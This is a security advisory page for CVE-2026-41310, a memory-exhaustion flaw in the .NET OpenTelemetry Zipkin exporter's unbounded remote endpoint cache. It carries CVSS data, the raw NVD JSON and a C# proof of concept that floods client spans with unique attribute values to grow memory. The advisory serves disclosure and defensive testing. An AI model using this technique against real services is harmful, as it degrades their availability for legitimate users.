Security Vulnerability Report
CVE-2026-41310 CVSS 5.3 MEDIUM

Published: 2026-05-06 22:16:26
Last Modified: 2026-05-11 14:40:45

Description

OpenTelemetry.Exporter.Zipkin is the .NET Zipkin exporter for OpenTelemetry. In versions 1.15.2 and earlier, the Zipkin exporter remote endpoint cache accepts unbounded key growth derived from span attributes. In high-cardinality scenarios, a process using Zipkin export for client or producer spans could experience avoidable memory growth under sustained unique remote endpoint values, increasing process memory usage over time and degrading availability. This issue is fixed in version 1.15.3, which introduces a bounded, thread-safe LRU cache for remote endpoints with a fixed maximum size.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:opentelemetry:opentelemetry.exporter.zipkin:*:*:*:*:*:.net:*:* - VULNERABLE
OpenTelemetry.Exporter.Zipkin <= 1.15.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```csharp
using System;
using System.Threading.Tasks;
using OpenTelemetry;
using OpenTelemetry.Trace;

namespace Poc
{
    public class ZipkinMemoryLeakPoc
    {
        public static async Task Main(string[] args)
        {
            // Build a tracer provider with the Zipkin exporter (vulnerable in versions <= 1.15.2).
            // AddSource is required so that spans from the "PocApp" tracer are actually
            // collected and handed to the exporter.
            using var tracerProvider = Sdk.CreateTracerProviderBuilder()
                .AddSource("PocApp")
                .AddZipkinExporter(o =>
                {
                    o.Endpoint = new Uri("http://localhost:9411/api/v2/spans");
                })
                .Build();

            // Take the tracer from the provider built above rather than from
            // TracerProvider.Default, so the spans go through the configured exporter pipeline.
            var tracer = tracerProvider.GetTracer("PocApp");

            Console.WriteLine("Starting High Cardinality Attack...");

            // Simulate an attack by sending requests with unique attributes
            for (int i = 0; i < 100000; i++)
            {
                // The affected remote endpoint cache is populated from client or producer spans,
                // so the spans are created with SpanKind.Client.
                using var span = tracer.StartActiveSpan("RequestSpan", SpanKind.Client);

                // Generate high-cardinality data to fill the cache
                // (TelemetrySpan exposes SetAttribute, not SetTag)
                string uniqueId = Guid.NewGuid().ToString();
                span.SetAttribute("http.user_agent", uniqueId);
                span.SetAttribute("http.url", $"http://example.com/{uniqueId}");

                // Simulate processing delay
                await Task.Delay(5);

                if (i % 1000 == 0)
                {
                    Console.WriteLine($"Sent {i} requests. Monitor memory growth.");
                }
            }
        }
    }
}
```

References

https://github.com/open-telemetry/opentelemetry-dotnet/pull/7081 (Issue Tracking)
https://github.com/open-telemetry/opentelemetry-dotnet/security/advisories/GHSA-88hf-wf7h-7w4m (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-41310",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-06T22:16:25.643",
    "lastModified": "2026-05-11T14:40:45.183",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenTelemetry.Exporter.Zipkin is the .NET Zipkin exporter for OpenTelemetry. In versions 1.15.2 and earlier, the Zipkin exporter remote endpoint cache accepts unbounded key growth derived from span attributes. In high-cardinality scenarios, a process using Zipkin export for client or producer spans could experience avoidable memory growth under sustained unique remote endpoint values, increasing process memory usage over time and degrading availability. This issue is fixed in version 1.15.3, which introduces a bounded, thread-safe LRU cache for remote endpoints with a fixed maximum size."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-400"},
          {"lang": "en", "value": "CWE-770"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:opentelemetry:opentelemetry.exporter.zipkin:*:*:*:*:*:.net:*:*",
                "versionEndExcluding": "1.15.3",
                "matchCriteriaId": "88FCC724-04D2-4E6A-9E07-8375E9E862DB"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/open-telemetry/opentelemetry-dotnet/pull/7081",
        "source": "[email protected]",
        "tags": ["Issue Tracking"]
      },
      {
        "url": "https://github.com/open-telemetry/opentelemetry-dotnet/security/advisories/GHSA-88hf-wf7h-7w4m",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```